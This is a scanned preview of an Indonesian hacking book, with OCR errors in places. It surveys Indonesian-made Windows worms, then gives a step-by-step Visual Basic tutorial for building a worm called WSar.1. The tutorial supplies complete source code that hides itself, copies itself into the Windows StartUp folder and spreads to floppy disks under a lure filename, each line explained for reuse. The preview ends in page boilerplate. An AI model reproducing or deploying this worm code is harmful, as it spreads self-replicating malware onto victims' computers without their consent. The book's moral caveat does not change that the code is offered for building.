1 I-WORM PERKASA Pada bulan 6 Desember 2001 muncul sebuah worm lokal.288 Kb dan dibuat dengan menggunakan program Visual Basic. kemudian menambahkan suatu nilai registry pada sub key 'Run’ agar worm ini tetap aktif saat Windows startup.exe’. Bab 2. Worm yang terkompresi dengan UPX ini memiliki ukuran sebesar 12. Jasakom  . Worm Netsky melakukan penyebaran dengan cara yang sama seperti yang dilakukan worm Bagle.Secret of Underground Coding : Uncensored 2. Mengenal Worm .Computer Worm 1 .Imelda atau I-Worm Updater ini menggunakan media Microsoft Outlook dalam penyebarannya.5. hanya saja Netsky memiliki beberapa rutin yang memungkinkan dirinya dapat melakukan penyebaran dengan menggunakan media aplikasi peer to peer. Netsky mengirimkan salinan dirinya melalui sebuah e-mail ber-attachment dan dalam bentuk file terkompresi. sebuah worm lainnya menyebar dengan kecepatan yang lebih tinggi. saat file infector dieksekusi worm ini meng-copy dirinya ke direktori Windows dengan nama 'UPDATE.18 NETSKY Tidak begitu lama setelah kemunculan worm Bagle. kemudian memanipulasi beberapa nilai registry yang bertujuan agar worm dapat tereksekusi setiap kali Windows startup.6. PERKEMBANGAN WORM LOKAL Berikut ini beberapa catatan singkat tentang worm lokal yang pernah ada dan dibuat oleh worm writer asal Indonesia. 2. File worm berukuran sebesar 22 Kb dan menggunakan icon yang disamarkan sehingga terlihat sebagai sebuah file dokumen Microsoft Word. Worm yang juga disebut dengan nama I-Worm. Saat file infector dieksekusi Netsky membuat salinan file worm pada direktori Windows dengan nama file 'services.EXE’.

Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori Windows dengan nama 'SysTask. Mengenal Worm . Pesin juga membuat salinan pada direktori My Documents dengan nama file 'MyHeart.6. Saat file infector dieksekusi worm membuat dua file. Worm yang terkompresi dengan ASPack ini juga sering dipanggil dengan sebutan Kenangan. Hallo. kemudian menambahkan value 'winloader’ pada registry run yang akan mengaktifkan worm setiap Windows startup. 2.6.2 PESIN Worm lokal lainnya muncul dipertengahan bulan September 2003 dengan menggunakan icon Microsoft Word.  Jasakom Bab 2. Mistery atau MyHeart.exe’ pada root direktori ’C:\’.exe’. Hanya saja worm ini baru banyak dikenal pada pertengahan Juli 2005. Puisi Cinta.Computer Worm 1 .3 TABARU Pada awal januari 2005 kembali diketahui sebuah worm lokal yang membawa-bawa nama pembawa acara Jejak Petualang di TV7 yaitu Riyanni Djangkaru. yang menarik dari worm ini adalah worm akan menonaktifkan program Registry Editor jika user berusaha untuk menjalankannya. Worm Pesin menggunakan media disket dalam proses penyebaran.exe’ pada direktori 'C:\!submit’ dan file 'riyani_jangkaru. yaitu file 'xpshare.Secret of Undeground Coding : Uncensored 2. Worm ini memiliki ukuran file sebesar 40 Kb dengan icon yang disamarkan sehingga terlihat seperti file jpg.exe’ kemudian menambahkan suatu nilai registry pada sub key 'Run’ agar worm ini tetap aktif saat Windows startup. Hal ini disebabkan karena worm Pesin menggunakan nama-nama tersebut sebagai nama dari file infector. hal ini sangat efektif mengingat penggunaan disket masih sangat diminati oleh pengguna komputer di Indonesia.

Saat buku ini ditulis worm Kangen sudah mencapai varian M.Secret of Underground Coding : Uncensored 2. Menariknya.6.5 KUMIS Diawal bulan Juli 2005. Seperti worm lokal terdahulu. Mengenal Worm 2. kemudian memanipulasi registry agar worm tetap aktif. anehnya worm satu ini sama sekali tidak dikompresi .EXE’ dengan ukuran file sebesar 64 Kb. MS Config dan Registry Editor. seorang worm writer yang konon terinspirasi oleh seorang dosennya yang berkumis tebal membuat worm yang kemudian disebut dengan worm Kumis. dengan berbekal refrain lagu Kangen (Dewa 19) worm ini sukses menginfeksi ratusan komputer di Indonesia. menggunakan icon Microsoft Word dan melakukan penyebaran lewat disket.Computer Worm 1 . yang menarik dari worm ini adalah worm akan berusaha menonaktifkan program Task Manager. Kangen juga dibuat dengan Visual Basic. Worm ini berukuran sebesar 76 Kb dan dikhususkan untuk sistem operasi Windows XP dan Windows Server 2003.4 KANGEN Pada pertengahan April 2005. Saat file infector dieksekusi worm ini membuat salinan dirinya ke direktori System Windows dengan nama 'username logon.6. Bab 2. Jasakom 4 . Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori System Windows dengan nama 'CCAPPS.exe’ dimana username adalah nama user aktif. worm kumis ini akan me-restart komputer setiap kali Windows startup. suatu worm lokal kembali meresahkan pengguna komputer.

Worm yang diisukan sebagai worm lokal ter-anyar yang pernah ada ini ternyata dibuat dalam bahasa Visual Basic .exe’. Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori Windows dengan nama 'lExplorer. 2. MS Config.Computer Worm 1 .7 RONTOKBRO Diawal bulan Oktober 2005. Task Manager dan CMD.8 NOBRON Tidak begitu lama setelah kemunculan RontokBro. worm lokal ini menyembunyikan file dokumen Microsoft Word dan membuat salinan dengan nama yang persis dengan nama file yang disembunyikan. Mengenal Worm 2.exe’.6 DECOIL Worm Decoil yang juga sering disebut Decoy ini muncul di penghujung tahun 2005. Nobron memiliki ukuran file sebesar 84 Kb.6.exe’. Decoy tergolong worm dengan ukuran yang sangat besar yaitu sebesar 154 Kb (besar file ini setelah dikompres dengan UPX).Secret of Undeground Coding : Uncensored 2. selain itu Nobron juga membuat salinan ke setiap root dari masing-masing drive termasuk USB Flash Disk dengan nama file 'foto administrator. Worm juga berusaha untuk menonaktifkan aplikasi Registry Editor.A@mm oleh Norman Virus Control ini berusaha untuk membersihkan system dari worm RontokBro. RontokBro juga memblokir aplikasi Registry Editor dan memonitor caption pada aplikasi browser. Bab 2.exe’. jika suatu string tertentu ditemukan oleh RontokBro maka komputer akan di-restart secara otomatis. pada direktori System Windows dan sub direktori '\i75-d2’ dengan nama file 'dkernel.  Jasakom . worm yang kemudian dikenali dengan nama W32/Nobron.6. Saat file infector dieksekusi worm ini meng-copy dirinya ke direktori System Windows dengan nama 'MsPatch.6. pengguna komputer di Indonesia kembali dikejutkan oleh sebuah worm lokal yang sudah menggunakan smtp sendiri dalam mengirimkan file infector-nya dan selektif dalam pemilihan alamat e-mail target.

wmplayer.Secret of Underground Coding : Uncensored 2.exe dan winampa. exe (Winamp) serta beberapa file program lainnya kemudian membuat salinan dirinya dengan nama dan letak yang sama. walaupun worm yang berukuran 68 Kb ini tidak melewati proses enkripsi dan kompresi namun BlueFantasy mempertahankan ciri khas worm komputer yang membuat banyak salinan. Runitis menggunakan icon Internet Explorer dalam penyebarannya.exe (Windows Media Player). dan membuat type file executable seperti exe dan scr akan terlihat sebagai aplikasi Microsoft Word. kembali diketahui sebuah worm lokal dengan ukuran file sebesar 164 Kb dan telah dikompres dengan aplikasi ASPack. My Documents.Computer Worm 1 .com’ dan menggunakan atribut Hidden.exe (MS Config). dan StartUp. Worm ini menghapus file program regedit.exe (Registry Editor).10 BLUEFANTASY Di akhir bulan Januari 2006. selain itu worm juga membuat salinan pada direktori Desktop. sebuah worm lokal bernama BlueFantasy ikut berlomba dengan worm lainnya. Bab 2. Kemudian worm memanipulasi suatu nilai registry yang akan membuat file worm tetap tereksekusi saat Windows startup. Jasakom  . Worm ini menggunakan nama yang diambil dari nama seorang penyanyi dari Malaysia yaitu Siti Nurhaliza (Runitis jika dibaca terbalik menjadi Sitinur).6. winamp. Mengenal Worm 2. Saat file infector dieksekusi BlueFantasy meng-copy dirinya ke direktori System Windows dengan nama file 'Win32. msconfig. dengan cara memonitor direktori aktif dan membuat salinan pada direktori tersebut. sehingga user malah akan menjalankan worm apabila mengeksekusi aplikasi-aplikasi tersebut.9 RUNITIS Pada akhir bulan Nopember 2005.6.

Bab 2. Untuk bertahan pada suatu system.12 MYBRO Di bulan Maret 2006.11 ROMDIL Pertengahan bulan Februari 2006. Worm MyBro diperkirakan menggunakan / meniru source code worm yang sudah ada sehingga pola worm tersebut dapat terdeteksi dengan mudah oleh teknologi SandBox dari Norman Virus Control.Secret of Undeground Coding : Uncensored 2. Panda dan PC Cilin. seperti kebanyakan worm lokal. TrendMicro. dan beberapa fasilitas Windows seperti Search dan Run. worm inipun dibuat dengan menggunakan bahasa Visual Basic. worm ini telah dikompres dengan menggunakan aplikasi UPX. MyBro berusaha untuk mematikan service antivirus dari Norman. MS Config. Worm Romdil memiliki ukuran file sebesar 40 Kb untuk varian A dan sebesar 41 Kb untuk varian B.  Jasakom . Mengenal Worm 2. sebuah worm lokal lainnya muncul dan dideteksi Norman Virus Control sebagai w32/Romdil. Selain itu MyBro berusaha untuk menghapus file Microsoft Visual Basic Virtual Machine yang akan menggagalkan proses untuk setiap aplikasi yang dibuat dengan menggunakan bahasa Visual Basic. Task Manager.6. McAfee. Norton. MyBro memiliki ukuran file sebesar 51 Kb dan menggunakan icon dengan gambar Folder.Computer Worm 1 . serta melakukan blocking ke beberapa situs tertentu. Registry Editor. Romdil berusaha untuk mencegah user mengeksekusi aplikasi CMD (command prompt). dan disamarkan sebagai file aplikasi Windows Explorer. Bit Defender. sebuah varian lain dari worm RontokBro kembali di-release dan diperkirakan dibuat dengan menggunakan bahasa C. AVG. Selain itu worm ini menggunakan icon dengan gambar Folder. Untuk bertahan pada suatu system.6.

File worm berukuran 32 Kb dan menggunakan icon file dokumen Microsoft Word. LightMoon menggunakan icon folder dan memiliki ukuran file sebesar 39 Kb.Secret of Underground Coding : Uncensored 2. namun sebagai gantinya IRCBot menggunakan metode Watcher yang terbilang masih baru pada awal tahun 2006.AQF Dibuat pada awal tahun 2006 dan mulai dikenal pada bulan April 2006. Bab 2. Mengenal Worm 2. Worm yang berasal dari Borneo alias Kalimantan ini tidak berusaha untuk mematikan proses Task Manager ataupun Registry Editor sebagai metode life defender. sehingga user malah mengeksekusi worm tersebut apabila menjalankan salah satu fungsi tersebut. yang akan me-restart komputer jika proses salah satu file launcher dimatikan.13 IRCBOT.6. Registry Editor.14 LIGHTMOON Worm dengan nama sebutan yang bisa memiliki arti sebagai bulan purnama ini.6. umumnya memiliki beberapa kesamaan teknik dengan worm lokal lainnya. hanya saja LightMoon ini akan mengalihkan akses dari fungsi MS Config. worm IRCBot menyebar dengan memuat sebuah pesan yang ditujukan pada Presiden. menyebar dipenghujung April 2006 dengan barisan puisi yang terinspirasi dari bulan purnama.Computer Worm 1 . Jasakom  . Task Manager dan Command Prompt pada file launcher worm.

Computer Worm 1 .1 . karena worm dapat menimbulkan kerugian yang sangat besar baik berupa materiil maupun non materiil. 10 Jasakom Bab 7.1 Kenapa bab ini ada? Bab ini adalah salah satu bab inti dari buku ini. karena akan mengingatkan pembaca semua. Perlu untuk penulis ingatkan kembali. penulis tetap memberikan trik-trik real yang digunakan para worm writer dalam membuat suatu worm. Namun demikian. bahwa membicarakan masalah pembuatan suatu worm membutuhkan pemahaman tentang tanggung jawab moral yang besar. Worm WSar.Secret of Undeground Coding : Uncensored BAB  WORM WSar. bahwa worm adalah program yang sangat berbahaya dan dapat dibuat dengan mudah. yang memuat tentang cara-cara pembuatan worm.

sehingga walaupun partisi pada harddisk tak sengaja terformat oleh worm. dan tidak digunakan oleh banyak orang 2. sangat disarankan untuk menggunakan komputer tersendiri yang khusus digunakan untuk keperluan ini. karena proses ini akan menimbulkan efek yang sama dengan restart komputer. virus atau malcode lain. ada beberapa ketentuan yang harus diperhatikan: 1. Sementara untuk program ShadowUser lebih flexibel. Teknik yang dibuatpun menjadi beragam. Worm WSar. Sudah menjadi suatu rahasia umum dimana para worm writer selalu mencari vulnerability baru karena vulnerability lama kebanyakan sudah memiliki patch untuk memperbaiki celah tersebut. kemudian instalkan DeepFreeze hanya pada drive C: saja sehingga data source code yang tersimpan pada drive D: tidak terganggu oleh DeepFreeze. Program ini akan membatalkan setiap perubahan yang dilakukan bahkan perubahan yang terjadi pada boot sector. Untuk program DeepFreeze disarankan agar membuat partisi lebih dari satu. Gunakan program pembantu seperti ShadowUser atau DeepFreeze. hanya dengan me-restart komputer maka segalanya akan kembali seperti semula.. jadi jika ternyata perlu me-restart komputer untuk melihat efek perubahan dari suatu worm. Anda tinggal menentukan folder apa saja yang ingin dibebaskan dari proteksi Bab 7. Jika memungkinkan. mungkin ungkapan ini tidak berlaku pada proses hacking saja tetapi juga sangat cocok apabila ungkapan ini digunakan dalam proses pembuatan suatu worm. baik dari vendor antivirus maupun dari vendor aplikasi atau sistem operasi itu sendiri.1 Jasakom 104 . misalnya dengan membuat dua partisi dimana partisi C: sebagai drive System Windows dan partisi D: sebagai drive data.Secret of Underground Coding : Uncensored B anyak jalan menuju Roma. Sebagai persiapan awal untuk membuat suatu worm.Computer Worm 1 . Program ini hanya mengembalikan perubahan pada saat komputer di restart. maka cukup dengan melakukan Log Off dan kemudian Log In kembali. penulis sendiri menemukan beberapa trik yang akan dipaparkan pada bab ini.

kita dapat mengganti baru dengan backup clonning yang sudah kita siapkan. memasang backdoor atau memformat harddisk. • Sub-rutin yang pertama berfungsi untuk melakukan penularan dengan cara membuat clonning (salinan) dirinya sendiri pada suatu system komputer.Secret of Undeground Coding : Uncensored 3.1 WORM DASAR 1 Suatu worm dasar dapat dipandang sebagai satu set instruksi berisi sedikitnya tiga sub-rutin yang terpasang.Computer Worm 1 .. Bab 7. Payload ini pada teorinya bisa berupa apa saja seperti menghapus data. Lagi pula kita tidak perlu berpindah-pindah tempat untuk mengoperasikannya. Keuntungan lain ternyata kita bisa membuat clonning dari suatu komputer virtual. Penulis juga menyarankan agar menggunakan aplikasi Visual Basic 6. Sub-rutin pelengkap lainnya bisa saja sebagai penentu kapan payload tersebut dilakukan. Program ini akan mensimulasikan suatu komputer maya sekaligus dengan jaringannya. Kita dapat membuat suatu lab komputer dengan sistem operasi yang berbeda sekaligus. sehingga apabila system suatu komputer virtual sudah tidak bisa diselamatkan lagi. Gunakan program pembantu seperti Virtual PC atau VMWare.0 Enterprise. karena untuk versi lain seperti Visual Basic 6. yang akan memastikan suatu worm tetap eksis pada suatu host system • Sub-rutin yang ketiga berfungsi sebagai pengatur payload (muatan maksud tertentu) yang mendikte suatu tindakan untuk dieksekusi. Worm WSar. • Sub-rutin yang kedua berfungsi sebagai live defender (rutin untuk bertahan hidup).0 Learning Edition penulis menemukan batasan-batasan dan ada fasilitas yang tidak bisa digunakan.1 . media penyimpanan atau melalui suatu jaringan. 10 Jasakom .

1 . Jika worm tidak mendapatkan eksistensinya maka worm akan melakukan reproduksi dengan menciptakan salinan dirinya pada direktori StartUp pada Startmenu 3.Computer Worm 1 . Pada kotak dialog New Project klik icon Standard EXE pada tab New dan klik Open. Bab 7. sehingga hanya dapat menginfeksi sistem operasi Windows 9x dan ME yang terinstal secara default pada drive C. Worm WSar. ALGORITMA Worm ini bernama WSar. untuk menampilkan kotak dialog New Project bisa dengan klik File pada menubar kemudian pilih New Project.. Setiap tanggal 13 bulan Oktober akan menampilkan pesan "WSar. PEMROGRAMAN Buka aplikasi Visual Basic. Jasakom 10 . Melakukan pemeriksaan terhadap eksistensi worm itu sendiri pada system komputer 2. WSar. Setiap 1 menit berusaha untuk membuat salinan worm ke disket pada drive A 4.1 Ada Pada Komputer Anda" dan menghentikan segala aktifitas worm pada hari tersebut.1 (worm dasar 1) yang menggunakan icon dengan gambar sebuah folder dan nama yang unik agar menarik minat user untuk mengeksekusinya.Secret of Underground Coding : Uncensored . merupakan worm yang sangat sederhana sekali.1 memiliki rutin-rutin yang akan melakukan tindakan sebagai berikut: 1.

aturlah Project Properties dengan mengklik kanan nama project pada jendela Project Explorer yang dalam hal ini nama project masih bernama Project1. Worm WSar. Sebagai langkah pertama.1 .Secret of Undeground Coding : Uncensored Visual basic secara otomatis memberikan sebuah project dengan nama default Project1 dan sebuah form di dalamnya dengan nama default Form1. kemudian klik 'Project1 Properties…’ 10 Jasakom Bab 7.Computer Worm 1 .

Worm WSar. Dalam pengisian Project Name. Untuk melanjutkan pindah ke menu Make dengan mengklik tab Make.1 kemudian hapus value untuk setiap Type pada frame Version Information.1 Ganti Application Title dari nama Project1 menjadi nama worm yaitu: WSar. Jasakom 10 . tanda titik. terutama untuk Type Company Name.Secret of Underground Coding : Uncensored Akan tampil kotak dialog Project Properties dan berada pada tab General. tidak boleh menggunakan spasi. Tentunya Anda tidak ingin nama perusahaan tempat Anda bekerja menjadi terkenal oleh worm ini bukan  ? Jika value yang dihapus ternyata kembali saat project di-load Anda bisa menghapusnya lagi dan menambahkan sebuah karakter spasi. Bab 7. tanda koma atau karakter spesial lainnya. Ganti Project Name dari nama Project1 menjadi nama worm yaitu: WSar. Kemudian pindah ke menu Compile dengan mengklik tab Compile.Computer Worm 1 .

Anda juga bisa meng-klik ComboBox pada jendela Properties dan pilih object Form1. nama form masih bernama Form1.Computer Worm 1 . Dalam hal ini.Secret of Undeground Coding : Uncensored Pilih opsi Compile to P-Code. Worm WSar. dengan mengklik nama form pada jendela Project Explorer. 10 Jasakom Bab 7.1 . Opsi ini akan membuat program yang dihasilkan berukuran lebih kecil daripada menggunakan opsi Compile to Native Code. secara otomatis segala properti pada Form1 akan ditampilkan pada jendela Properties. Akhiri dengan menekan tombol OK. Langkah kedua adalah mengatur properties pada form.

Jasakom 110 . klik tombol View Code kemudian klik ComboBox Object pada Code Editor dan pilih Form.Computer Worm 1 . WSar. Worm WSar. ShowInTaskbar Visible False False Langkah ketiga adalah menambahkan object Timer pada form yang bertujuan untuk melakukan perulangan terhadap instruksi tertentu tanpa memerlukan suatu interaksi oleh user. kemudian atur jenis properti berikut ini pada Timer1: Bab 7.1 Jenis Name Enable Interval Nilai tmrWSar True 60000 Keterangan Mengatur nama Timer menjadi tmrWSar Pastikan Timer akan aktif saat form di-load Setiap instruksi pada procedure Timer akan dieksekusi setiap 1 menit Langkah keempat adalah mengetikan kode program worm. klik ComboBox Event dan pilih Load. ico Tidak menampilkan form pada taskbar Tidak menampilkan form pada layar.1 menggunakan icon folder. Untuk itu klik ganda object Timer pada toolbox yang akan membuat sebuah object Timer dengan nama default Timer1. Untuk itu klik ganda bidang form hingga jendela Code Editor tampil dengan langsung membuat suatu sub 'Form Load’.Secret of Underground Coding : Uncensored Kemudian atur jenis properti berikut ini pada Form1: Jenis Name Icon Nilai frmWSar1 (Icon) Keterangan Mengatur nama form menjadi frmWSar1 Pilih icon yang akan digunakan pada form. Anda juga bisa mengklik nama form pada jendela Explorer.

exe")) = 0 Then FileCopy(WormFile.exe") End If If App.Path = "A:\" Or App.Path = "B:\" Then Unload(Me) End If End Sub Private Sub tmrWSar_Timer() On Error Resume Next If Len(Dir$("A:\Game Collection.exe")) = 0 Then FileCopy(WormFile.Computer Worm 1 .exe") End If If Day(Now) = 13 And Month(Now) = 10 Then MsgBox("WSar.PrevInstance = True Then End If Len(Dir$("C:\WINDOWS\Start Menu\Programs\StartUp\Syst" & _ "em File.1 . Worm WSar.EXEName & ".Secret of Undeground Coding : Uncensored Ketik kode program berikut ini: 'WSar.1 by Achmad Darmal 'Tarakan.1 Ada Pada Komputer Anda") Unload(Me) End If End Sub Private Function WormFile() Dim WPath.Path If Right(WPath. WName As String WPath = App. "C:\WINDOWS\Start Menu\Programs\Star" & _ "tUp\System File. Kalimantan Timur . "A:\Game Collection. 1) <> "\" Then WPath = WPath & "\" End If WName = App.exe" WormFile = WPath & WName End Function 111 Jasakom Bab 7.Indonesia Option Explicit On Private Sub Form_Load() On Error Resume Next If App.

suatu kejadian saat form diaktifkan untuk pertama kali atau sesaat sebelum ditampilkan. Kalimantan Timur – Indonesia Option Explicit Dua baris teratas adalah baris komentar. maka… Jasakom 11 . karena program akan mengacuhkan kesalahan tersebut dan kemudian mengakses instruksi setelahnya. If App. If Len(Dir$("C:\WINDOWS\Start Menu\Programs\Star" & _ "tUp\System File.Computer Worm 1 . Private Sub Form_Load() Baris ini menandakan awal dari sebuah procedure.exe")) = 0 Then Jika banyak karakter dalam pencarian "C:\WINDOWS\Start Menu\ Programs\StartUp\System File. diawali dengan single quote.exe" adalah 0 (nol) maka file tersebut tidak ditemukan (sebaliknya akan menghasilkan nilai 15 jika file tersebut ditemukan. Biasanya digunakan untuk memberi keterangan tentang program atau apapun yang ingin programmer sampaikan kepada pengguna kode tersebut.1 Statement ini akan sangat berguna apabila terjadi suatu kesalahan.PrevInstance = True Then End Jika file aplikasi yang sama sudah berjalan maka akhiri proses pengeksekusian file tersebut. Statement Option Explicit pada baris ketiga memastikan agar seluruh variabel dideklarasikan.1 by Achmad Darmal 'Tarakan. On Error Resume Next Bab 7. Statement ini berguna untuk mencegah suatu file aplikasi yang sama dieksekusi lebih dari satu kali. Nilai 15 berasal dari jumlah karakter pada nama file). Worm WSar.Secret of Underground Coding : Uncensored Berikut penjelasan tentang kode program: 'WSar. dalam hal ini adalah procedure yang akan dikerjakan pada event Form_Load.

Secret of Undeground Coding : Uncensored FileCopy WormFile.ex e" adalah lokasi dan nama file untuk tujuan penyalinan file. Jika file "A:\Game Collection. Statement ini bertujuan untuk mencegah file worm yang berada pada disket bertahan di memory. WormFile adalah suatu function untuk mendapatkan full path (alamat penuh) file utama.exe")) = 0 Then FileCopy(WormFile.exe".Path = "A:\" Or App. End If digunakan untuk menutup statement If sebelumnya.exe" FileCopy adalah function untuk membuat salinan suatu file. Sedangkan "C:\WINDOWS\StartMenu\Programs\StartUp\System File.exe" tidak ditemukan maka meng-copy file utama ke drive A dengan nama "Game Collection. Worm WSar. If App. seperti disket dan usb disk. "A:\Game Collection.1 Ada Pada Komputer Anda") Unload(Me) End If End Sub Memulai suatu procedure baru terhadap object tmrWSar (Timer).exe") End If If Day(Now) = 13 And Month(Now) = 10 Then MsgBox("WSar. Hal ini sebaiknya juga dilakukan untuk setiap removable disk. Sub berfungsi untuk mengakhiri procedure Private Sub tmrWSar_Timer() On Error Resume Next If Len(Dir$("A:\Game Collection.Computer Worm 1 .Path = "B:\" Then Unload Me End If End Sub Statement End Form_Load. mengacuhkan error apabila terjadi dan mengeksekusi instruksi setelahnya. Jika tanggal sekarang adalah 13 dan bulan sekarang adalah 10 (Okto- 11 Jasakom Bab 7. WormFile mewakili nama main file (file utama) yang terproses. .1 Jika path file utama pada drive A atau pada drive B maka akhiri aplikasi. Akhirnya. "C:\WINDOWS\Start Menu\Prog" & _ "rams\StartUp\System File.

Secret of Underground Coding : Uncensored ber) maka tampilkan pesan "WSar. dengan meng-click File pada menubar kemudian pilih Save Project.Computer Worm 1 . kemudian menentukan lokasi file utama dengan function App.Path dan menyimpannya dalam variabel WPath. Karena nama file yang didapatkan dari function ini belum memiliki ekstensi. Jasakom 114 . maka ditambahkan string ". kemudian mengatur nilai variabel WName dengan nilai berupa nama file utama yang didapat dari function App.1 Ada Pada Komputer Anda" serta bersihkan worm dari memory. Jika satu karakter disebelah kanan nilai variabel WPath tidak sama dengan "\" maka nilai variabel WPath ditambahkan karakter "\" dibelakangnya.EXEName.exe" dibelakangnya. Private Function WormFile() Dim WPath.Path If Right(WPath.exe" WormFile = WPath & WName End Function Function WormFile dibuat untuk mendapatkan path penuh file utama. Worm WSar. dimulai dengan pendeklarasian WPath untuk lokasi dan WName untuk nama file. WName As String WPath = App.1 Langkah kelima adalah menyimpan project yang telah selesai dibuat. menandakan file tersebut adalah file executable. Bab 7. sehingga untuk hari tersebut worm tidak akan melakukan aktifitas apapun.EXEName & ". 1) <> "\" Then WPath = WPath & "\" End If WName = App..

Tentukan suatu folder atau buat folder baru dengan mengklik tombol New Folder. yang berfungsi untuk menyimpan form. module dan sebagainya yang akan disimpan. kemudian dalam hal ini klik Make WSar. Exe yang akan menampilkan kotak dialog Make Project.Secret of Undeground Coding : Uncensored Kemudian akan tampil kotak dialog Save File As. Untuk itu klik File pada menubar.1 Berikutnya akan tampil kotak dialog Save Project As. .Computer Worm 1 . yang berfungsi untuk menyimpan project secara keseluruhan. Worm WSar. Langkah terakhir adalah mengkompilasi project menjadi suatu file executable. 11 Jasakom Bab 7.

Worm WSar.Secret of Underground Coding : Uncensored Isi TextBox File name dengan nama File Exe yang akan dibuat yang dalam contoh ini bernama WSar.exe.1 : untuk lokasi direktori StartUp pada Windows 2000 dan XP secara default adalah sebagai berikut: 1.Computer Worm 1 . Catatan untuk WSar. C:\Documents and Settings\Default User\Start Menu\ Programs\ startup Bab 7. Klik OK untuk memulai proses kompilasi. Pilih direktori tempat file tersebut akan diletakkan.1 Jasakom 11 . C:\Documents and Settings\All Users\Start Menu\Progra ms\ startup 3. C:\Documents and Settings\Administrator\Start Menu\ Programs\startup 2.

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->